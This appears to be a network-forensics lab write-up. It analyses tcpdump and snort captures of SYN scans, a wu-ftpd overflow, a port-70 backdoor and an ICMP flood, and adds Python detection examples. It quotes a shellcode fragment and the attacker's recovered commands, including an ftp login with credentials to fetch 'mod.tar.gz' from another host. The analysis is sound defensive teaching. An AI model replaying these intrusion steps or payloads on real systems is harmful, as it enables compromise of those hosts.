TCPDUMP files analysis
======================

0011021200 directory

  tcpdump -r 0011021200 port 25

shows some scanning from ntec20 and then normal anonymous ftp from ntec20.

*** Please identify what type of scanning this is and record it in your report.
    Give evidence for that (dump packets in your report). ***

  snort -dCvr 0011021200 'tcp[13] & 8 !=0' and dst ntec81 | gfilter

shows anonymous ftp from ntec20.

  mkdir /tmp/alog
  snort -oder 0011021200 -c /usr/local2/etc/snort/snort.conf -l /tmp/alog

/tmp/alog/portscan.log shows a SYN scan from 192.168.64.20 (ntec20):

  Nov 2 12:03:57 192.168.64.20:1374 -> 192.168.128.81:260 SYN ******S*
  Nov 2 12:03:57 192.168.64.20:1375 -> 192.168.128.81:1539 SYN ******S*
  Nov 2 12:03:57 192.168.64.20:1376 -> 192.168.128.81:629 SYN ******S*
  Nov 2 12:03:57 192.168.64.20:1377 -> 192.168.128.81:938 SYN ******S*
  Nov 2 12:03:57 192.168.64.20:1378 -> 192.168.128.81:766 SYN ******S*
  Nov 2 12:03:57 192.168.64.20:1379 -> 192.168.128.81:821 SYN ******S*
  Nov 2 12:03:57 192.168.64.20:1380 -> 192.168.128.81:461 SYN ******S*
  Nov 2 12:03:57 192.168.64.20:1381 -> 192.168.128.81:797 SYN ******S*
  Nov 2 12:03:57 192.168.64.20:1382 -> 192.168.128.81:937 SYN ******S*
  ...
0011021445 directory

  snort -oder 0011021445 -c /usr/local2/etc/snort/snort.conf -l /tmp/alog

/tmp/alog/portscan.log shows a SYN scan from 192.168.64.23:

  Nov 2 14:54:42 192.168.64.23:4769 -> 192.168.128.81:1103 SYN ******S*
  Nov 2 14:54:42 192.168.64.23:4770 -> 192.168.128.81:138 SYN ******S*
  Nov 2 14:54:42 192.168.64.23:4771 -> 192.168.128.81:126 SYN ******S*
  Nov 2 14:54:42 192.168.64.23:4772 -> 192.168.128.81:503 SYN ******S*

0011021500 directory

  tcpdump -r 0011021500 port 25

  15:07:44.908245 ntec9-38.52264 > ntec81.smtp: S 4232288827:4232288827(0) win 2048
  15:07:44.908319 ntec81.smtp > ntec9-38.52264: S 362888347:362888347(0) ack 4232288828 win 31624 (DF)
  15:07:44.908534 ntec9-38.52264 > ntec81.smtp: R 4232288828:4232288828(0) win 0

shows a half-open SYN scan: the scanner sends SYN, ntec81 answers SYN/ACK, and the scanner replies with RST instead of completing the handshake.

0011021630 directory

  tcpdump -r 0011021630 port 25

  16:36:37.766947 ntec10-38.43217 > ntec81.smtp: S 2014313259:2014313259(0) win 2048
  16:36:37.767015 ntec81.smtp > ntec10-38.43217: S 1703337482:1703337482(0) ack 2014313260 win 31624 (DF)
  16:36:37.767167 ntec10-38.43217 > ntec81.smtp: R 2014313260:2014313260(0) win 0

shows the same half-open SYN scan pattern from ntec10-38.

0011021645 directory

  snort -dCvr 0011021645 'tcp[13] & 8 !=0' and dst ntec81 | gfilter | more

  11/02-16:49:45.256116 192.168.128.94:1096 -> 192.168.128.81:79
  ..
  11/02-16:50:14.376004 192.168.128.94:1097 -> 192.168.128.81:21
  USER ftp..
  11/02-16:50:14.377822 192.168.128.94:1097 -> 192.168.128.81:21
  PASS ...........................................................
  ................................................................
  ................................................................
  ................................................................
  ................................................................
  ................................1.1.1..F..1.1.C..A.?...k^1.1..^.
  .F.f.....'..1..^..=..1.1..^..C.1...1..^.......u.1..F..^..=.....0
  ...F.1..F..v..F....N..V.....1.1.............0bin0sh1..11..
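The half-open scan verdict rests on the three-segment pattern (SYN, SYN/ACK, RST, no third-handshake ACK and no data). The Python below is an added example, not code from these notes or from tcpdump: it parses old-style tcpdump TCP lines, groups them into flows and labels each flow "half-open", "established" or "incomplete". The first six lines are the ntec9-38 and ntec10-38 exchanges shown above; the last four are a constructed ordinary SMTP connection from ntec20, added for contrast.

```python
"""Classify TCP connection attempts in tcpdump output (added example)."""
import re

# Six lines from the notes, then a constructed completed SMTP handshake.
TCPDUMP_LINES = """\
15:07:44.908245 ntec9-38.52264 > ntec81.smtp: S 4232288827:4232288827(0) win 2048
15:07:44.908319 ntec81.smtp > ntec9-38.52264: S 362888347:362888347(0) ack 4232288828 win 31624 (DF)
15:07:44.908534 ntec9-38.52264 > ntec81.smtp: R 4232288828:4232288828(0) win 0
16:36:37.766947 ntec10-38.43217 > ntec81.smtp: S 2014313259:2014313259(0) win 2048
16:36:37.767015 ntec81.smtp > ntec10-38.43217: S 1703337482:1703337482(0) ack 2014313260 win 31624 (DF)
16:36:37.767167 ntec10-38.43217 > ntec81.smtp: R 2014313260:2014313260(0) win 0
16:40:01.100000 ntec20.1400 > ntec81.smtp: S 100:100(0) win 2048
16:40:01.100100 ntec81.smtp > ntec20.1400: S 500:500(0) ack 101 win 31624 (DF)
16:40:01.100300 ntec20.1400 > ntec81.smtp: . ack 501 win 2048
16:40:01.200000 ntec20.1400 > ntec81.smtp: P 101:107(6) ack 501 win 2048
"""

# "HH:MM:SS.usec host.port > host.port: FLAGS [seq:end(len)] [ack N] ..."
LINE_RE = re.compile(
    r"^(?P<ts>\d\d:\d\d:\d\d\.\d+) "
    r"(?P<src>[\w-]+)\.(?P<sport>\w+) > (?P<dst>[\w-]+)\.(?P<dport>\w+): "
    r"(?P<flags>[SRPF.]+)"
    r"(?: (?P<seq>\d+):(?P<seqend>\d+)\((?P<len>\d+)\))?"
    r"(?: ack (?P<ack>\d+))?"
)


def parse_tcpdump(text):
    """Parse matching lines into dicts; 'ack' is None when the segment has no ACK."""
    pkts = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            d = m.groupdict()
            d["len"] = int(d["len"]) if d["len"] else 0
            pkts.append(d)
    return pkts


def classify_flows(text):
    """Return {(client, cport, server, sport): verdict}.  The client is the
    endpoint that sent the first segment seen for the 4-tuple."""
    flows = {}
    for p in parse_tcpdump(text):
        a, b = (p["src"], p["sport"]), (p["dst"], p["dport"])
        f = flows.setdefault(tuple(sorted([a, b])), {"client": a, "server": b, "pkts": []})
        f["pkts"].append(p)

    verdicts = {}
    for f in flows.values():
        client, server = f["client"], f["server"]
        from_client = [p for p in f["pkts"] if (p["src"], p["sport"]) == client]
        from_server = [p for p in f["pkts"] if (p["src"], p["sport"]) != client]
        syn = any(p["flags"] == "S" and p["ack"] is None for p in from_client)
        synack = any("S" in p["flags"] and p["ack"] is not None for p in from_server)
        # third handshake step: a client segment carrying ACK but neither SYN nor RST
        ack3 = any(p["ack"] is not None and not set(p["flags"]) & {"S", "R"}
                   for p in from_client)
        rst = any("R" in p["flags"] for p in from_client)
        if syn and synack and ack3:
            verdict = "established"
        elif syn and synack and rst:
            verdict = "half-open"      # SYN, SYN/ACK, then RST: the scan signature
        else:
            verdict = "incomplete"
        verdicts[(client[0], client[1], server[0], server[1])] = verdict
    return verdicts


if __name__ == "__main__":
    for key, verdict in classify_flows(TCPDUMP_LINES).items():
        print(f"{key[0]}.{key[1]} > {key[2]}.{key[3]}: {verdict}")
```

A flow is only called half-open when the SYN/ACK is actually seen; a SYN that gets no reply at all (a closed or filtered port) stays "incomplete", which keeps the verdict tied to the evidence in the dump.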
shows the ftp attack.

  snort -oder 0011021645 -c /usr/local2/etc/snort/snort.conf -l /tmp/alog

/tmp/alog/alert shows:

  [**] [1:344:1] FTP EXPLOIT wu-ftpd 2.6.0 linux overflow [**]
  [Classification: Attempted Administrator Privilege Gain] [Priority: 1]
  11/02-16:50:14.377822 0:D0:9:2D:6F:3 -> 0:D0:9:28:97:E6 type:0x800 len:0x23C
  192.168.128.94:1097 -> 192.168.128.81:21 TCP TTL:64 TOS:0x0 ID:59488 IpLen:20 DgmLen:558 DF
  ***AP*** Seq: 0x981E5A02  Ack: 0x99C00CF3  Win: 0x7D78  TcpLen: 32
  TCP Options (3) => NOP NOP TS: 933502437 10851767
  [Xref => http://www.whitehats.com/info/IDS287]

  [**] [1:648:4] SHELLCODE x86 NOOP [**]
  [Classification: Executable code was detected] [Priority: 1]
  11/02-16:55:38.289920 0:D0:9:28:97:E6 -> 0:D0:9:2D:6F:3 type:0x800 len:0x5EA
  192.168.128.81:21 -> 192.168.128.94:1100 TCP TTL:64 TOS:0x10 ID:6082 IpLen:20 DgmLen:1500 DF
  ***A**** Seq: 0xA8B09DF0  Ack: 0xA7AB20B2  Win: 0x7C70  TcpLen: 32
  TCP Options (3) => NOP NOP TS: 10884161 933534831
  [Xref => http://www.whitehats.com/info/IDS181]

0011021700 directory

  snort -dCvr 0011021700 'tcp[13] & 8 !=0' and dst ntec81 | gfilter

  11/02-17:01:28.611403 192.168.128.94:1104 -> 192.168.128.81:21
  PASS ...........................................................
  ................................................................
  ................................................................
  ................................................................
  ................................................................
  ................................1.1.1..F..1.1.C..A.?...k^1.1..^.
  .F.f.....'..1..^..=..1.1..^..C.1...1..^.......u.1..F..^..=.....0
  ...F.1..F..v..F....N..V.....1.1.............0bin0sh1..11..
shows the attack from 192.168.128.94.

  snort -oder 0011021700 -c /usr/local2/etc/snort/snort.conf -l /tmp/alog

  [**] [1:344:1] FTP EXPLOIT wu-ftpd 2.6.0 linux overflow [**]
  [Classification: Attempted Administrator Privilege Gain] [Priority: 1]
  11/02-17:01:28.611403 0:D0:9:2D:6F:3 -> 0:D0:9:28:97:E6 type:0x800 len:0x23C
  192.168.128.94:1104 -> 192.168.128.81:21 TCP TTL:64 TOS:0x0 ID:1343 IpLen:20 DgmLen:558 DF
  ***AP*** Seq: 0xC3B1CC24  Ack: 0xC3B55385  Win: 0x7D78  TcpLen: 32
  TCP Options (3) => NOP NOP TS: 933569865 10919196
  [Xref => http://www.whitehats.com/info/IDS287]

Please list the commands the hacker executed at that time.

  /bin/uname -a;/usr/bin/id;
  whoami
  hostname
  cd /usr/lib
  ftp ntec94
  user tuser 12345678
  cd /tmp
  get mod.tar.gz

0011021745 directory

  snort -dCvr 0011021745 'tcp[13] & 8 !=0' and dst ntec81 | gfilter | more

  11/02-17:45:22.507733 192.168.128.94:1111 -> 192.168.128.81:70
  ps -ef..
  11/02-17:45:24.372239 192.168.128.94:1111 -> 192.168.128.81:70
  ps -aux..
  11/02-17:46:26.101327 192.168.128.94:1111 -> 192.168.128.81:70
  pwd..
  11/02-17:46:29.013348 192.168.128.94:1111 -> 192.168.128.81:70
  cd /usr/lib/src..
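Both the FTP overflow evidence (the PASS command whose argument is hundreds of non-printable bytes, printed as dots by snort -C) and the port-70 command listing come out of the same gfilter layout: one header line per PSH segment, then the payload wrapped at 64 columns. The Python below is an added example, not part of these notes, snort or gfilter. It parses that layout once and uses it twice: to reconstruct the command timeline sent to ntec81:70, and to flag FTP control-channel commands whose argument is overlong or mostly non-printable, which is the shape the wu-ftpd alert fired on. The header lines and short payloads are copied from the listings above; the long PASS payload is constructed (plain dots standing in for the non-printable bytes) rather than copied from the capture, and the length and ratio thresholds are assumptions.

```python
"""Reconstruct sessions and flag oversized FTP arguments from snort -dC / gfilter
output (added example)."""
import re

# "MM/DD-HH:MM:SS.usec src:sport -> dst:dport"; payload lines follow the header.
HEADER_RE = re.compile(
    r"^(?P<ts>\d\d/\d\d-\d\d:\d\d:\d\d\.\d+) "
    r"(?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)$"
)

# Headers and short payloads from the notes; the PASS payload is constructed.
GFILTER_OUTPUT = "\n".join([
    "11/02-16:49:45.256116 192.168.128.94:1096 -> 192.168.128.81:79",
    "..",                                   # finger request: just CR LF
    "11/02-16:50:14.376004 192.168.128.94:1097 -> 192.168.128.81:21",
    "USER ftp..",
    "11/02-16:50:14.377822 192.168.128.94:1097 -> 192.168.128.81:21",
    "PASS " + "." * 59,                     # constructed: 64-column wrapped dots
    "." * 64,
    "." * 64,
    "." * 30,
    "11/02-17:45:22.507733 192.168.128.94:1111 -> 192.168.128.81:70",
    "ps -ef..",
    "11/02-17:45:24.372239 192.168.128.94:1111 -> 192.168.128.81:70",
    "ps -aux..",
    "11/02-17:46:26.101327 192.168.128.94:1111 -> 192.168.128.81:70",
    "pwd..",
    "11/02-17:46:29.013348 192.168.128.94:1111 -> 192.168.128.81:70",
    "cd /usr/lib/src..",
])


def parse_gfilter(text):
    """Return [{ts, src, sport, dst, dport, payload}]; the wrapped payload
    lines of one segment are joined back into a single string."""
    records = []
    for line in text.splitlines():
        m = HEADER_RE.match(line.rstrip())
        if m:
            rec = m.groupdict()
            rec["payload"] = ""
            records.append(rec)
        elif records:
            records[-1]["payload"] += line
    return records


def strip_crlf(payload):
    """Drop the trailing CR LF, which -C output prints as two dots."""
    return payload[:-2] if payload.endswith("..") else payload


def session_commands(records, dst, dport):
    """Commands sent to dst:dport in capture order; empty payloads are dropped."""
    out = []
    for r in records:
        if (r["dst"], r["dport"]) == (dst, dport):
            cmd = strip_crlf(r["payload"])
            if cmd:
                out.append((r["ts"], cmd))
    return out


def suspicious_ftp_commands(records, max_arg_len=64, max_nonprint_ratio=0.5):
    """FTP control-channel commands (port 21) whose argument is longer than
    max_arg_len or made mostly of non-printable bytes (dots in -C output).
    Returns (ts, verb, argument length, non-printable ratio) per hit."""
    hits = []
    for r in records:
        if r["dport"] != "21":
            continue
        verb, _, arg = strip_crlf(r["payload"]).partition(" ")
        if not arg:
            continue
        ratio = arg.count(".") / len(arg)
        if len(arg) > max_arg_len or ratio > max_nonprint_ratio:
            hits.append((r["ts"], verb, len(arg), round(ratio, 2)))
    return hits


if __name__ == "__main__":
    recs = parse_gfilter(GFILTER_OUTPUT)
    for ts, cmd in session_commands(recs, "192.168.128.81", "70"):
        print(f"{ts}  port 70  {cmd}")
    for ts, verb, n, ratio in suspicious_ftp_commands(recs):
        print(f"{ts}  suspicious {verb}: {n}-byte argument, {ratio:.0%} non-printable")
```

The dot-ratio test is a heuristic of the -C rendering: a literal "." in a path or password also prints as a dot, so a short argument such as "cd /usr/lib/src" is never flagged by the ratio alone, and the length check is what catches an argument of several hundred bytes where FTP expects a word.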
The backdoor should be on port 70: the commands above are all sent to ntec81:70.

0011022200 directory

  tcpdump -nr 0011022200 | more

  22:01:46.288718 235.116.33.0 > 192.168.128.50: icmp: echo request [ttl 0]
  22:01:46.288810 37.54.66.0 > 192.168.128.50: icmp: echo request [ttl 0]
  22:01:46.288902 84.232.73.0 > 192.168.128.50: icmp: echo request [ttl 0]
  22:01:46.288993 241.75.127.0 > 192.168.128.50: icmp: echo request [ttl 0]
  22:01:46.289085 229.60.192.0 > 192.168.128.50: icmp: echo request [ttl 0]
  22:01:46.289178 37.20.181.0 > 192.168.128.50: icmp: echo request [ttl 0]
  22:01:46.289270 25.31.202.0 > 192.168.128.50: icmp: echo request [ttl 0]
  22:01:46.289362 177.70.98.0 > 192.168.128.50: icmp: echo request [ttl 0]
  22:01:46.289456 215.108.211.0 > 192.168.128.50: icmp: echo request [ttl 0]

ICMP flood attack on 192.168.128.50: nine echo requests within one millisecond, each from a different source address (all ending in .0, TTL 0), which points to spoofed sources.
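The flood verdict rests on rate and source diversity rather than on any single packet. The Python below is an added example, not part of these notes or of tcpdump: it parses tcpdump -n echo-request lines and, per destination, reports the packet count, the arrival rate, the number of distinct sources and how many packets carried TTL 0, then flags destinations whose requests arrive far faster than a host pings and come from many different sources. The first nine lines are the ones shown above; the last three are a constructed ordinary ping from one host to ntec81, added for contrast. The rate and ratio thresholds and the minimum time span are assumptions for the example.

```python
"""Spot an ICMP echo-request flood in tcpdump -n output (added example)."""
import re

# Nine lines from the notes, then a constructed one-per-second ping to ntec81.
TCPDUMP_ICMP = """\
22:01:46.288718 235.116.33.0 > 192.168.128.50: icmp: echo request [ttl 0]
22:01:46.288810 37.54.66.0 > 192.168.128.50: icmp: echo request [ttl 0]
22:01:46.288902 84.232.73.0 > 192.168.128.50: icmp: echo request [ttl 0]
22:01:46.288993 241.75.127.0 > 192.168.128.50: icmp: echo request [ttl 0]
22:01:46.289085 229.60.192.0 > 192.168.128.50: icmp: echo request [ttl 0]
22:01:46.289178 37.20.181.0 > 192.168.128.50: icmp: echo request [ttl 0]
22:01:46.289270 25.31.202.0 > 192.168.128.50: icmp: echo request [ttl 0]
22:01:46.289362 177.70.98.0 > 192.168.128.50: icmp: echo request [ttl 0]
22:01:46.289456 215.108.211.0 > 192.168.128.50: icmp: echo request [ttl 0]
22:05:00.000000 192.168.128.20 > 192.168.128.81: icmp: echo request
22:05:01.000000 192.168.128.20 > 192.168.128.81: icmp: echo request
22:05:02.000000 192.168.128.20 > 192.168.128.81: icmp: echo request
"""

# "HH:MM:SS.usec src > dst: icmp: echo request [ttl N]" (tcpdump prints the
# bracketed ttl only when it is 0)
LINE_RE = re.compile(
    r"^(?P<hh>\d\d):(?P<mm>\d\d):(?P<ss>\d\d\.\d+) "
    r"(?P<src>[\d.]+) > (?P<dst>[\d.]+): icmp: echo request"
    r"(?: \[ttl (?P<ttl>\d+)\])?"
)

# Floor for the observed time span, so a burst inside one microsecond still
# yields a finite rate (assumption for this example).
MIN_SPAN_SECONDS = 0.001


def parse_echo_requests(text):
    """Parse echo-request lines into dicts with a seconds-since-midnight timestamp."""
    pkts = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        t = int(m["hh"]) * 3600 + int(m["mm"]) * 60 + float(m["ss"])
        pkts.append({"t": t, "src": m["src"], "dst": m["dst"],
                     "ttl": int(m["ttl"]) if m["ttl"] else None})
    return pkts


def echo_request_report(pkts):
    """Per destination: count, distinct sources, TTL-0 packets and packets/second."""
    by_dst = {}
    for p in pkts:
        by_dst.setdefault(p["dst"], []).append(p)
    report = {}
    for dst, ps in by_dst.items():
        times = sorted(p["t"] for p in ps)
        span = max(times[-1] - times[0], MIN_SPAN_SECONDS)
        report[dst] = {
            "count": len(ps),
            "distinct_sources": len({p["src"] for p in ps}),
            "ttl_zero": sum(1 for p in ps if p["ttl"] == 0),
            "pps": len(ps) / span,
        }
    return report


def flagged_floods(report, min_packets=5, min_pps=1000, min_source_ratio=0.5):
    """Destinations hit at >= min_pps by requests that come from a different
    source address at least min_source_ratio of the time (spoofing indicator)."""
    return sorted(
        dst for dst, r in report.items()
        if r["count"] >= min_packets
        and r["pps"] >= min_pps
        and r["distinct_sources"] / r["count"] >= min_source_ratio
    )


if __name__ == "__main__":
    rep = echo_request_report(parse_echo_requests(TCPDUMP_ICMP))
    for dst, r in rep.items():
        print(f"{dst}: {r['count']} requests, {r['distinct_sources']} sources, "
              f"{r['ttl_zero']} with ttl 0, {r['pps']:.0f} pps")
    print("flood targets:", flagged_floods(rep))
```

On the nine-line excerpt the rate comes out around 9000 packets per second with nine distinct sources, so 192.168.128.50 is flagged; the constructed ping to ntec81 runs at 1.5 packets per second from a single source and is not. The TTL-0 count is reported separately because a legitimate ping never arrives with TTL 0.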